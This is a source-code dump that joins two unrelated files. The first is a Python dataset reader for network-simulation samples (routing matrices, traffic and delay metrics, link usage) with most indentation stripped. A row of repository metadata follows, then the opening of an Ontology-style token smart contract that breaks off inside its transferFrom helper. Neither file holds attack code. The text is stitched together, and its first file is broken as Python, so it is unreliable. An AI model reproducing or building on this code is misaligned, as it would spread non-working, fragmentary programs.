def get_srcdst_performance(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Result matrix for the requested src-dst.
"""
return self.performance_matrix[src, dst]
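    # Access sketch (hypothetical node ids): the returned dict holds the
    # aggregated metrics plus a per-flow list, as built by the parser below.
    #   s.get_srcdst_performance(0, 1)['AggInfo']['AvgDelay']
    #   s.get_srcdst_performance(0, 1)['Flows'][0]['Jitter']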
def get_traffic_matrix(self):
"""
Returns the traffic_matrix of this Sample instance.
"""
return self.traffic_matrix
def get_srcdst_traffic(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Traffic matrix for the requested src-dst.
"""
return self.traffic_matrix[src, dst]
def get_routing_matrix(self):
"""
Returns the routing_matrix of this Sample instance.
"""
return self.routing_matrix
def get_srcdst_routing(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary
Information stored in the Routing matrix for the requested src-dst.
"""
return self.routing_matrix[src, dst]
def get_topology_object(self):
"""
Returns the topology in networkx format of this Sample instance.
"""
return self.topology_object
def get_network_size(self):
"""
Returns the number of nodes of the topology.
"""
return self.topology_object.number_of_nodes()
def get_node_properties(self, id):
"""
Parameters
----------
id : int
Node identifier.
Returns
-------
Dictionary with the parameters of the node
None if node doesn't exist
"""
res = None
if id in self.topology_object.nodes:
res = self.topology_object.nodes[id]
return res
def get_link_properties(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary with the parameters of the link
None if no link exist between src and dst
"""
res = None
if dst in self.topology_object[src]:
res = self.topology_object[src][dst][0]
return res
def get_srcdst_link_bandwidth(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Bandwidth in bits/time unit of the link between nodes src-dst or -1 if not connected
"""
if dst in self.topology_object[src]:
cap = float(self.topology_object[src][dst][0]['bandwidth'])
else:
cap = -1
return cap
def get_links_performance(self):
"""
Returns the links_performance object of this Sample instance.
"""
        if self.links_performance is None:
raise DatanetException("ERROR: The processed dataset doesn't have link performance data")
return self.links_performance
def get_srcdst_link_performance(self, src, dst):
"""
Parameters
----------
src : int
Source node.
dst : int
Destination node.
Returns
-------
Dictionary with the performance metrics of the link
None if no link exist between src and dst
"""
        if self.links_performance is None:
raise DatanetException("ERROR: The processed dataset doesn't have link performance data")
res = None
if dst in self.links_performance[src]:
res = self.links_performance[src][dst]
return res
def _set_data_set_file_name(self,file):
"""
Sets the data set file from where the sample is extracted.
"""
self.data_set_file = file
def _set_performance_matrix(self, m):
"""
Sets the performance_matrix of this Sample instance.
"""
self.performance_matrix = m
def _set_traffic_matrix(self, m):
"""
Sets the traffic_matrix of this Sample instance.
"""
self.traffic_matrix = m
def _set_routing_matrix(self, m):
"""
        Sets the routing_matrix of this Sample instance.
"""
self.routing_matrix = m
def _set_topology_object(self, G):
"""
Sets the topology_object of this Sample instance.
"""
self.topology_object = G
def _set_global_packets(self, x):
"""
Sets the global_packets of this Sample instance.
"""
self.global_packets = x
def _set_global_losses(self, x):
"""
Sets the global_losses of this Sample instance.
"""
self.global_losses = x
def _set_global_delay(self, x):
"""
Sets the global_delay of this Sample instance.
"""
self.global_delay = x
def _get_data_set_file_name(self):
"""
Gets the data set file from where the sample is extracted.
"""
return self.data_set_file
def _get_path_for_srcdst(self, src, dst):
"""
Returns the path between node src and node dst.
"""
return self.routing_matrix[src, dst]
def _get_timedis_for_srcdst (self, src, dst):
"""
Returns the time distribution of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['TimeDist']
def _get_eqlambda_for_srcdst (self, src, dst):
"""
Returns the equivalent lambda for the traffic between node src and node
dst.
"""
return self.traffic_matrix[src, dst]['EqLambda']
def _get_timedistparams_for_srcdst (self, src, dst):
"""
Returns the time distribution parameters for the traffic between node
src and node dst.
"""
return self.traffic_matrix[src, dst]['TimeDistParams']
def _get_sizedist_for_srcdst (self, src, dst):
"""
Returns the size distribution of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['SizeDist']
def _get_avgpktsize_for_srcdst_flow (self, src, dst):
"""
Returns the average packet size for the traffic between node src and
node dst.
"""
return self.traffic_matrix[src, dst]['AvgPktSize']
def _get_sizedistparams_for_srcdst (self, src, dst):
"""
        Returns the size distribution parameters of traffic between node src and node dst.
"""
return self.traffic_matrix[src, dst]['SizeDistParams']
def _get_resultdict_for_srcdst (self, src, dst):
"""
Returns the dictionary with all the information for the communication
between node src and node dst regarding communication parameters.
"""
return self.performance_matrix[src, dst]
def _get_trafficdict_for_srcdst (self, src, dst):
"""
Returns the dictionary with all the information for the communication
between node src and node dst regarding size and time distribution
parameters.
"""
return self.traffic_matrix[src, dst]
class DatanetAPI:
"""
    Class containing all the functionality to read the dataset line by line
    by means of an iterator, and to generate a Sample instance with the
    information gathered.
"""
def __init__ (self, data_folder, intensity_values = [], shuffle=False):
"""
        Initialization of the DatanetAPI instance
Parameters
----------
data_folder : str
Folder where the dataset is stored.
        intensity_values : int or array [x, y]
            User-defined intensity value, or [min, max] range of values, used
            to constrain the reading process to matching samples.
shuffle: boolean
Specify if all files should be shuffled. By default false
Returns
-------
None.
"""
self.data_folder = data_folder
self.intensity_values = intensity_values
self.shuffle = shuffle
self._all_tuple_files = []
self._selected_tuple_files = []
self._graphs_dic = {}
self._routings_dic = {}
for root, dirs, files in os.walk(self.data_folder):
if ("graphs" not in dirs or "routings" not in dirs):
print("Downloading dataset")
download_dataset(self.data_folder)
# Generate graphs dictionaries
self._graphs_dic[root] = self._generate_graphs_dic(os.path.join(root,"graphs"))
if (len(self._graphs_dic[root].keys()) == 0):
print("No graphs found in directory "+root)
print("Downloading dataset")
download_dataset(self.data_folder)
self._routings_dic[root] = {}
files.sort()
# Extend the list of files to process
self._all_tuple_files.extend([(root, f) for f in files if f.endswith("tar.gz")])
def get_available_files(self):
"""
Get a list of all the dataset files located in the indicated data folder
Returns
-------
Array of tuples where each tuple is (root directory, filename)
"""
return (self._all_tuple_files.copy())
def set_files_to_process(self, tuple_files_lst):
"""
Set the list of files to be processed by the iterator. The files should belong to
the list of tuples returned by get_available_files.
Parameters
----------
tuple_files_lst: List of tuples
List of tuples where each tuple is (path to file, filename)
"""
if not type(tuple_files_lst) is list:
raise DatanetException("ERROR: The argument of set_files_to_process should be a list of tuples -> [(root_dir,file),...]")
        for tuple_file in tuple_files_lst:
            if not isinstance(tuple_file, tuple) or len(tuple_file) != 2:
                raise DatanetException("ERROR: The argument of set_files_to_process should be a list of tuples -> [(root_dir,file),...]")
            if tuple_file not in self._all_tuple_files:
                raise DatanetException("ERROR: Selected tuple does not belong to the list of tuples returned by get_available_files()")
self._selected_tuple_files = tuple_files_lst.copy()
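    # Usage sketch (hypothetical folder and intensity range): select files,
    # then iterate to consume one Sample per simulation iteration.
    #   api = DatanetAPI("./data", intensity_values=[800, 1200])
    #   api.set_files_to_process(api.get_available_files()[:2])
    #   for s in api:
    #       print(s.get_global_delay())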
def _readRoutingFile(self, routing_file, netSize):
"""
        TODO: compare against _getRoutingSrcPortDst.
Parameters
----------
routing_file : str
File where the routing information is located.
netSize : int
Number of nodes in the network.
Returns
-------
R : netSize x netSize matrix
Matrix where each [i,j] states what port node i should use to
reach node j.
"""
fd = open(routing_file,"r")
R = numpy.zeros((netSize, netSize)) - 1
src = 0
for line in fd:
camps = line.split(',')
dst = 0
for port in camps[:-1]:
R[src][dst] = port
dst += 1
src += 1
return (R)
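    # Routing file sketch (assumed format, as parsed above): one line per
    # source node with comma-separated egress ports indexed by destination
    # and a trailing comma; -1 marks "no next hop", e.g. for three nodes:
    #   -1,0,1,
    #   0,-1,1,
    #   0,1,-1,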
def _getRoutingSrcPortDst(self, G):
"""
Return a dictionary of dictionaries with the format:
node_port_dst[node][port] = next_node
Parameters
----------
        G : graph
            Graph representing the network.
Returns
-------
None.
"""
node_port_dst = {}
for node in G:
port_dst = {}
node_port_dst[node] = port_dst
for destination in G[node].keys():
port = G[node][destination][0]['port']
node_port_dst[node][port] = destination
return(node_port_dst)
def _create_routing_matrix_from_dst_routing_file(self, G, routing_file):
"""
Parameters
----------
G : graph
Graph representing the network.
routing_file : str
File where the information about routing is located. The file is a
destination routing file.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
netSize = G.number_of_nodes()
node_port_dst = self._getRoutingSrcPortDst(G)
R = self._readRoutingFile(routing_file, netSize)
MatrixPath = numpy.empty((netSize, netSize), dtype=object)
for src in range (0,netSize):
for dst in range (0,netSize):
node = src
path = [node]
while (R[node][dst] != -1):
                out_port = R[node][dst]
next_node = node_port_dst[node][out_port]
path.append(next_node)
node = next_node
MatrixPath[src][dst] = path
return (MatrixPath)
def _create_routing_matrix_from_src_routing_dir(self, G, src_routing_dir):
"""
Parameters
----------
G : graph
Graph representing the network.
src_routing_dir : str
            Directory where the routing files are located, one per source node.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
netSize = G.number_of_nodes()
node_port_dst = self._getRoutingSrcPortDst(G)
src_R = []
for i in range(netSize):
routing_file = os.path.join(src_routing_dir,"Routing_src_"+str(i)+".txt")
src_R.append(self._readRoutingFile(routing_file, netSize))
MatrixPath = numpy.empty((netSize, netSize), dtype=object)
for src in range (0,netSize):
R = src_R[src]
for dst in range (0,netSize):
node = src
path = [node]
while (R[node][dst] != -1):
                out_port = R[node][dst]
next_node = node_port_dst[node][out_port]
path.append(next_node)
node = next_node
MatrixPath[src][dst] = path
return (MatrixPath)
def _create_routing_matrix(self, G,routing_file):
"""
Parameters
----------
G : graph
Graph representing the network.
routing_file : str
File where the information about routing is located.
Returns
-------
MatrixPath : NxN Matrix
Matrix where each cell [i,j] contains the path to go from node
i to node j.
"""
if (os.path.isfile(routing_file)):
MatrixPath = self._create_routing_matrix_from_dst_routing_file(G,routing_file)
elif(os.path.isdir(routing_file)):
MatrixPath = self._create_routing_matrix_from_src_routing_dir(G,routing_file)
return (MatrixPath)
def _generate_graphs_dic(self, path):
"""
Return a dictionary with networkx objects generated from the GML
files found in path
Parameters
----------
path : str
            Directory where the graph files are located.
Returns
-------
Returns a dictionary where keys are the names of GML files found in path
and the values are the networkx object generated from the GML files.
"""
graphs_dic = {}
for topology_file in os.listdir(path):
G = networkx.read_gml(path+"/"+topology_file, destringizer=int)
graphs_dic[topology_file] = G
return graphs_dic
def _graph_links_update(self,G,file):
"""
Updates the graph with the link information of the file
Parameters
----------
G : graph
Graph object to be updated
file: str
file name that contains the information of the links to be modified: src;dst;bw (bps)
Returns
-------
None
"""
try:
fd = open(file,"r")
except:
print ("ERROR: %s not exists" % (file))
exit(-1)
for line in fd:
aux = line.split(";")
G[int(aux[0])][int(aux[1])][0]["bandwidth"] = aux[2]
def _generate_routings_dic(self, path,G):
"""
Return a dictionary with routing matrices generated from the
routing files found in path
Parameters
----------
path : str
            Directory where the routing files are located.
G : graph
Returns
-------
Returns a dictionary where keys are the names of routing files found in
path and the values are the routing matrices generated from the routing
files.
"""
routings_dic = {}
for routing_file in os.listdir(path):
R = self._create_routing_matrix(G,path+"/"+routing_file)
routings_dic[routing_file] = R
return routings_dic
def _check_intensity(self, file):
"""
Parameters
----------
file : str
Name of the data file that needs to be filtered by intensity.
Returns
-------
        2 if the range of intensities treated in the file satisfies the needs
        of the user.
1 if there may be lines in the file that do not fulfill the user
requirements.
0 if the file does not fulfill the user-defined intensity requirements.
"""
aux = file.split('_')
aux = aux[2]
aux = aux.split('-')
aux = list(map(int, aux))
# User introduced range of intensities
if(len(self.intensity_values) > 1):
if(len(aux) > 1):
if(aux[0] >= self.intensity_values[0]) and (aux[1] <= self.intensity_values[1]):
return 2
elif(aux[0] > self.intensity_values[1]) or (self.intensity_values[0] > aux[1]):
return 0
else:
return 1
else:
if(aux[0] >= self.intensity_values[0] and aux[0] <= self.intensity_values[1]):
return 2
else:
return 0
# User introduced single intensity
elif (len(self.intensity_values) == 1):
if(len(aux) == 1 and self.intensity_values[0] == aux[0]):
return 2
return 0
else:
return 2
def __iter__(self):
"""
Yields
------
s : Sample
Sample instance containing information about the last line read
from the dataset.
"""
g = None
if (len(self._selected_tuple_files) > 0):
tuple_files = self._selected_tuple_files
else:
tuple_files = self._all_tuple_files
if self.shuffle:
random.Random(1234).shuffle(tuple_files)
ctr = 0
for root, file in tuple_files:
            if (len(self.intensity_values) == 0):
                feasibility_of_file = 2
            else:
                feasibility_of_file = self._check_intensity(file)
if(feasibility_of_file != 0):
try:
it = 0
tar = tarfile.open(os.path.join(root, file), 'r:gz')
dir_info = tar.next()
results_file = tar.extractfile(dir_info.name+"/simulationResults.txt")
traffic_file = tar.extractfile(dir_info.name+"/traffic.txt")
status_file = tar.extractfile(dir_info.name+"/stability.txt")
input_files = tar.extractfile(dir_info.name+"/input_files.txt")
if (dir_info.name+"/flowSimulationResults.txt" in tar.getnames()):
flowresults_file = tar.extractfile(dir_info.name+"/flowSimulationResults.txt")
else:
flowresults_file = None
if (dir_info.name+"/linkUsage.txt" in tar.getnames()):
link_usage_file = tar.extractfile(dir_info.name+"/linkUsage.txt")
else:
link_usage_file = None
while(True):
s = Sample()
s._set_data_set_file_name(os.path.join(root, file))
s._results_line = results_file.readline().decode()[:-2]
s._traffic_line = traffic_file.readline().decode()[:-1]
if (flowresults_file):
s._flowresults_line = flowresults_file.readline().decode()[:-2]
s._status_line = status_file.readline().decode()[:-1]
s._input_files_line = input_files.readline().decode()[:-1]
if (link_usage_file):
s._link_usage_line = link_usage_file.readline().decode()[:-1]
if (len(s._results_line) == 0) or (len(s._traffic_line) == 0):
break
if (not ";OK;" in s._status_line):
print ("Removed iteration: "+s._status_line)
continue;
if (feasibility_of_file == 1):
ptr = s._traffic_line.find('|')
specific_intensity = float(s._traffic_line[0:ptr])
if(specific_intensity < self.intensity_values[0]) or (specific_intensity > self.intensity_values[1]):
continue
used_files = s._input_files_line.split(';')
s._graph_file = used_files[1]
s._routing_file = used_files[2]
g = self._graphs_dic[root][s._graph_file]
if (len(used_files) == 4):
self._graph_links_update(g,os.path.join(root,"links_bw",used_files[3]))
                        # XXX We consider that all graphs using the same routing file share the same topology
if (s._routing_file in self._routings_dic[root]):
routing_matrix = self._routings_dic[root][s._routing_file]
else:
routing_matrix = self._create_routing_matrix(g,os.path.join(root,"routings",s._routing_file))
self._routings_dic[root][s._routing_file] = routing_matrix
s._set_routing_matrix(routing_matrix)
s._set_topology_object(g)
self._process_flow_results_traffic_line(s._results_line, s._traffic_line, s._flowresults_line, s._status_line, s)
if (s._link_usage_line):
self._process_link_usage_line(s._link_usage_line,s)
                        it += 1
yield s
except (GeneratorExit,SystemExit) as e:
raise
except:
#traceback.print_exc()
print ("Error in the file: %s iteration: %d" % (file,it))
else:
continue
ctr += 1
print("Progress check: %d/%d" % (ctr,len(tuple_files)))
def _process_flow_results_traffic_line(self, rline, tline, fline, sline, s):
"""
Parameters
----------
rline : str
Last line read in the results file.
tline : str
Last line read in the traffic file.
fline : str
Last line read in the flows file.
        sline : str
            Last line read in the stability (status) file.
        s : Sample
Instance of Sample associated with the current iteration.
Returns
-------
None.
"""
q_flows = queue.Queue()
first_params = rline.split('|')[0].split(',')
first_params = list(map(float, first_params))
s._set_global_packets(first_params[0])
s._set_global_losses(first_params[1])
s._set_global_delay(first_params[2])
r = rline[rline.find('|')+1:].split(';')
if (fline):
f = fline.split(';')
else:
f = r
ptr = tline.find('|')
t = tline[ptr+1:].split(';')
s.maxAvgLambda = float(tline[:ptr])
sim_time = float(sline.split(';')[0])
m_result = []
m_traffic = []
for i in range(0,len(r), int(math.sqrt(len(r)))):
new_result_row = []
new_traffic_row = []
for j in range(i, i+int(math.sqrt(len(r)))):
dict_result_srcdst = {}
aux_agg_ = r[j].split(',')
aux_agg = list(map(float, aux_agg_))
dict_result_agg = {'PktsDrop':aux_agg[2], "AvgDelay":aux_agg[3], "AvgLnDelay":aux_agg[4], "p10":aux_agg[5], "p20":aux_agg[6], "p50":aux_agg[7], "p80":aux_agg[8], "p90":aux_agg[9], "Jitter":aux_agg[10]}
lst_result_flows = []
aux_result_flows = f[j].split(':')
for flow in aux_result_flows:
dict_result_tmp = {}
tmp_result_flow = flow.split(',')
tmp_result_flow = list(map(float, tmp_result_flow))
q_flows.put([tmp_result_flow[0], tmp_result_flow[1]])
dict_result_tmp = {'PktsDrop':tmp_result_flow[2], "AvgDelay":tmp_result_flow[3], "AvgLnDelay":tmp_result_flow[4], "p10":tmp_result_flow[5], "p20":tmp_result_flow[6], "p50":tmp_result_flow[7], "p80":tmp_result_flow[8], "p90":tmp_result_flow[9], "Jitter":tmp_result_flow[10]}
lst_result_flows.append(dict_result_tmp)
dict_traffic_srcdst = {}
# From kbps to bps
dict_traffic_agg = {'AvgBw':aux_agg[0]*1000,
'PktsGen':aux_agg[1],
'TotalPktsGen':aux_agg[1]*sim_time}
lst_traffic_flows = []
aux_traffic_flows = t[j].split(':')
for flow in aux_traffic_flows:
dict_traffic = {}
q_values_for_flow = q_flows.get()
tmp_traffic_flow = flow.split(',')
tmp_traffic_flow = list(map(float, tmp_traffic_flow))
offset = self._timedistparams(tmp_traffic_flow,dict_traffic)
if offset != -1:
self._sizedistparams(tmp_traffic_flow, offset, dict_traffic)
# From kbps to bps
dict_traffic['AvgBw'] = q_values_for_flow[0]*1000
dict_traffic['PktsGen'] = q_values_for_flow[1]
dict_traffic['TotalPktsGen'] = sim_time * dict_traffic['PktsGen']
dict_traffic['ToS'] = tmp_traffic_flow[-1]
if (len(dict_traffic.keys())!=0):
lst_traffic_flows.append (dict_traffic)
dict_result_srcdst['AggInfo'] = dict_result_agg
dict_result_srcdst['Flows'] = lst_result_flows
dict_traffic_srcdst['AggInfo'] = dict_traffic_agg
dict_traffic_srcdst['Flows'] = lst_traffic_flows
new_result_row.append(dict_result_srcdst)
new_traffic_row.append(dict_traffic_srcdst)
m_result.append(new_result_row)
m_traffic.append(new_traffic_row)
m_result = numpy.asmatrix(m_result)
m_traffic = numpy.asmatrix(m_traffic)
s._set_performance_matrix(m_result)
s._set_traffic_matrix(m_traffic)
def _timedistparams(self, data, dict_traffic):
"""
Parameters
----------
data : List
List of all the flow traffic parameters to be processed.
dict_traffic: dictionary
Dictionary to fill with the time distribution information
extracted from data
Returns
-------
offset : int
Number of elements read from the list of parameters data
"""
# print(data[0])
if data[0] == 0:
dict_traffic['TimeDist'] = TimeDist.EXPONENTIAL_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
params['ExpMaxFactor'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 1:
dict_traffic['TimeDist'] = TimeDist.DETERMINISTIC_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
dict_traffic['TimeDistParams'] = params
return 3
elif data[0] == 2:
dict_traffic['TimeDist'] = TimeDist.UNIFORM_T
params = {}
params['EqLambda'] = data[1]
params['MinPktLambda'] = data[2]
params['MaxPktLambda'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 3:
dict_traffic['TimeDist'] = TimeDist.NORMAL_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
params['StdDev'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 4:
dict_traffic['TimeDist'] = TimeDist.ONOFF_T
params = {}
params['EqLambda'] = data[1]
params['PktsLambdaOn'] = data[2]
params['AvgTOff'] = data[3]
params['AvgTOn'] = data[4]
params['ExpMaxFactor'] = data[5]
dict_traffic['TimeDistParams'] = params
return 6
elif data[0] == 5:
dict_traffic['TimeDist'] = TimeDist.PPBP_T
params = {}
params['EqLambda'] = data[1]
params['BurstGenLambda'] = data[2]
params['Bitrate'] = data[3]
params['ParetoMinSize'] = data[4]
params['ParetoMaxSize'] = data[5]
params['ParetoAlfa'] = data[6]
params['ExpMaxFactor'] = data[7]
dict_traffic['TimeDistParams'] = params
return 8
else: return -1
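        # A minimal decoding sketch (values are hypothetical), assuming the
        # distribution code data[0] is 0 (TimeDist.EXPONENTIAL_T):
        #
        #   data = [0, 1500.0, 1.2, 10.0]
        #   offset = self._timedistparams(data, dict_traffic)
        #   # offset == 4
        #   # dict_traffic == {'TimeDist': TimeDist.EXPONENTIAL_T,
        #   #                  'TimeDistParams': {'EqLambda': 1500.0,
        #   #                                     'AvgPktsLambda': 1.2,
        #   #                                     'ExpMaxFactor': 10.0}}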
def _sizedistparams(self, data, starting_point, dict_traffic):
"""
Parameters
----------
data : List
List of all the flow traffic parameters to be processed.
starting_point : int
Point of the overall traffic file line where the extraction of
data regarding the size distribution should start.
dict_traffic : dictionary
Dictionary to fill with the size distribution information
extracted from data
Returns
-------
ret : int
0 if it finish successfully and -1 otherwise
"""
if data[starting_point] == 0:
dict_traffic['SizeDist'] = SizeDist.DETERMINISTIC_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 1:
dict_traffic['SizeDist'] = SizeDist.UNIFORM_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['MinSize'] = data[starting_point+2]
params['MaxSize'] = data[starting_point+3]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 2:
dict_traffic['SizeDist'] = SizeDist.BINOMIAL_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['PktSize1'] = data[starting_point+2]
params['PktSize2'] = data[starting_point+3]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 3:
dict_traffic['SizeDist'] = SizeDist.GENERIC_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['NumCandidates'] = data[starting_point+2]
for i in range(0, int(data[starting_point+2]) * 2, 2):
params["Size_%d"%(i/2)] = data[starting_point+3+i]
params["Prob_%d"%(i/2)] = data[starting_point+4+i]
dict_traffic['SizeDistParams'] = params
else:
return -1
return 0
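        # A companion sketch (hypothetical values), assuming the size code at
        # data[starting_point] is 0 (SizeDist.DETERMINISTIC_S):
        #
        #   data = [..., 0, 1000.0]   # code, then AvgPktSize
        #   ret = self._sizedistparams(data, starting_point, dict_traffic)
        #   # ret == 0
        #   # dict_traffic['SizeDistParams'] == {'AvgPktSize': 1000.0}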
def _process_link_usage_line(self, lline,s):
"""
Parameters
----------
lline : str
Last line read in the links usage file.
s : Sample
Instance of Sample associated with the current iteration.
Returns
-------
None.
"""
# link_stat is an array of the nodes containing a dictionary with the adjacent nodes.
# Each adjacent node contains a dictionary with performance metrics
links_stat = []
l = lline.split(";")
netSize = s.get_network_size()
for i in range(netSize):
links_stat.append({})
for j in range(netSize):
if (l[i*netSize*2+j*2] == "-1"):
continue
link_stat = {}
link_stat["utilization"] = float(l[i*netSize*2+j*2])
link_stat["loses"] = float(l[i*netSize*2+j*2+1])
links_stat[i][j] = link_stat
#
s.links_performance = links_stat
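        # Resulting structure (numbers illustrative): for an existing link from
        # node 0 to node 1,
        #   s.links_performance[0][1] == {"utilization": 0.42, "loses": 0.0}
        # Adjacencies marked "-1" in the input line are simply absent from the
        # per-node dictionary.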
| 33.230831
| 293
| 0.539771
|
4a1452950529a775356e462203a19d06863c5532
| 10,117
|
py
|
Python
|
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | null | null | null |
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | null | null | null |
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | 1
|
2020-09-11T02:30:51.000Z
|
2020-09-11T02:30:51.000Z
|
from boa.interop.System.Storage import Put, Get, GetContext
from boa.builtins import concat
from boa.interop.System.Storage import Put, Delete
from boa.interop.System.Runtime import CheckWitness, Notify
from template_contract_test.libs.SafeCheck import Require, RequireScriptHash,RequireWitness
from template_contract_test.libs.Utils import SafePut
from template_contract_test.libs.SafeMath import Sub, Add
TOKEN_NAME = 'My Simple Token'
TOKEN_SYMBOL = 'MST'
################################################################################
# TOKEN INFO CONSTANTS
# DEPLOYER is AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p---616f2a4a38396ff203ea01e6c070ae421bb8ce2d
DEPLOYER = bytearray(b'\x61\x6f\x2a\x4a\x38\x39\x6f\xf2\x03\xea\x01\xe6\xc0\x70\xae\x42\x1b\xb8\xce\x2d')
INIT_SUPPLY = 1000000000
TOKEN_DECIMALS = 8
FACTOR = 100000000
################################################################################
# STORAGE KEY CONSTANT
# Belows are storage key for some variable token information.
OWNER_KEY = '___OWNER'
MST_SUPPLY_KEY = '__SUPPLY'
################################################################################
# STORAGE KEY PREFIX
# Since all data are stored in the key-value storage, the data need to be
# classified by key prefix. All key prefixes length must be the same.
OWN_PREFIX = '_____own'
ALLOWANCE_PREFIX = '___allow'
################################################################################
#
def Main(operation, args):
if operation == 'deploy':
return Deploy()
elif operation == 'name':
return TOKEN_NAME
elif operation == 'decimals':
return TOKEN_DECIMALS
elif operation == 'symbol':
return TOKEN_SYMBOL
elif operation == 'totalSupply':
return TotalSupply()
elif operation == 'balanceOf':
if len(args) == 1:
return BalanceOf(args[0])
elif operation == 'transfer':
if len(args) == 3:
return Transfer(args[0], args[1], args[2])
elif operation == 'transferFrom':
if len(args) == 4:
return TransferFrom(args[0], args[1], args[2], args[3])
elif operation == 'approve':
if len(args) == 3:
return Approve(args[0], args[1], args[2])
elif operation == 'allowance':
if len(args) == 2:
return Allowance(args[0], args[1])
elif operation == 'mint':
if len(args) == 2:
return Mint(args[0], args[1])
elif operation == 'burn':
if len(args) == 1:
return Burn(args[0])
elif operation == 'transferOwnership':
if len(args) == 1:
return TransferOwnership(args[0])
return False
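# A hedged invocation sketch (addresses and amounts are hypothetical); the
# runtime routes every contract call through Main(operation, args):
#
#   Main('balanceOf', [addr])                        # -> integer balance
#   Main('transfer', [from_addr, to_addr, 10])       # -> True on success
#   Main('approve', [owner_addr, spender_addr, 100])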
def Deploy():
"""
Constructor of this contract. Only deployer hard-coded can call this function
and cannot call this function after called once.
Followings are initialization list for this token
1. Transfer the owner to the deployer. (Owner can mint and burn the token)
2. Supply initial coin to the deployer.
"""
ctx = GetContext()
Require(CheckWitness(DEPLOYER)) # only can be initialized by deployer
Require(not Get(ctx, 'DEPLOYED')) # only can deploy once
# disable to deploy again
Put(ctx, 'DEPLOYED', 1)
# the first owner is the deployer
# can transfer ownership to other by calling `transferOwner` function
Put(ctx, OWNER_KEY, DEPLOYER)
# supply the coin. All coin will belong to deployer.
Put(ctx, MST_SUPPLY_KEY, INIT_SUPPLY * FACTOR)
Put(ctx, concat(OWN_PREFIX, DEPLOYER), INIT_SUPPLY * FACTOR)
return True
def TotalSupply():
"""
Gets the total supply for MST token. The total supply can be changed by
owner's invoking function calls for minting and burning.
"""
return _totalSupply(GetContext())
def BalanceOf(account):
"""
Gets the MST token balance of an account.
:param account: account
"""
return _balanceOf(GetContext(), account)
def Transfer(_from, _to, _value):
"""
Sends the amount of tokens from address `from` to address `to`. The parameter
`from` must be the invoker.
:param _from: invoker address.
:param _to: receiver address.
:param _value: MST amount.
"""
RequireWitness(_from) # from address validation
return _transfer(GetContext(), _from, _to, _value)
def TransferFrom(_originator, _from, _to, _amount):
"""
Transfers the amount of tokens in `from` address to `to` address by invoker.
Only approved amount can be sent.
:param _originator: invoker address.
:param _from: address for withdrawing.
:param _to: address to receive.
:param _amount: MST amount.
"""
return _transferFrom(GetContext(), _originator, _from, _to, _amount)
def Approve(_from, _to, _amount):
"""
    Approves `to` address to withdraw MST token from the invoker's address.
    The amount is added on top of any previously approved value (see `_approve`).
:param _from: invoker address.
:param _to: address to approve.
:param _amount: MST amount to approve.
"""
RequireWitness(_from) # only the token owner can approve
return _approve(GetContext(), _from, _to, _amount)
def Burn(_amount):
"""
Burns the amount of MST token from the owner's address.
:param _amount: MST amount to burn.
"""
ctx = GetContext()
_onlyOwner(ctx) # only owner can burn the token
return _burn(ctx, Get(ctx, OWNER_KEY), _amount)
def Mint(_to, _amount):
"""
Mints the amount of MST token.
:param _to: address to receive token.
:param _amount: the amount to mint.
"""
ctx = GetContext()
_onlyOwner(ctx) # only owner can mint token
return _mint(ctx, _to, _amount)
def TransferOwnership(_account):
"""
Transfers the ownership of this contract to other.
:param _account: address to transfer ownership.
"""
ctx = GetContext()
_onlyOwner(ctx)
return _transferOwnership(ctx, _account)
def Allowance(_from, _to):
"""
Gets the amount of allowance from address `from` to address `to`.
:param _from: from address
:param _to: to address
:return: the amount of allowance.
"""
return _allowance(GetContext(), _from, _to)
################################################################################
# INTERNAL FUNCTIONS
# Internal functions checks parameter and storage result validation but these
# wouldn't check the witness validation, so caller function must check the
# witness if necessary.
def _transfer(_context, _from, _to, _value):
Require(_value > 0) # transfer value must be over 0
RequireScriptHash(_to) # to-address validation
from_val = _balanceOf(_context, _from)
to_val = _balanceOf(_context, _to)
from_val = Sub(from_val, _value)
to_val = Add(to_val, _value)
SafePut(_context, concat(OWN_PREFIX, _from), from_val)
SafePut(_context, concat(OWN_PREFIX, _to), to_val)
Notify(["transfer", from_val, to_val, _value])
return True
def _balanceOf(_context, _account):
return Get(_context, concat(OWN_PREFIX, _account))
def _transferFrom(_context, _owner, _spender, _to, _amount):
RequireWitness(_owner)
RequireScriptHash(_spender)
RequireScriptHash(_to)
Require(_amount > 0)
approve_key = concat(ALLOWANCE_PREFIX, concat(_spender, _owner))
approve_amount = Get(_context, approve_key)
approve_amount = Sub(approve_amount, _amount)
